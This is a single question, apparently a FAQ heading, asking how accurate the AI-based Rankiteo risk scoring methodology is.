How accurate is the A.I Rankiteo Risk Scoring methodology ?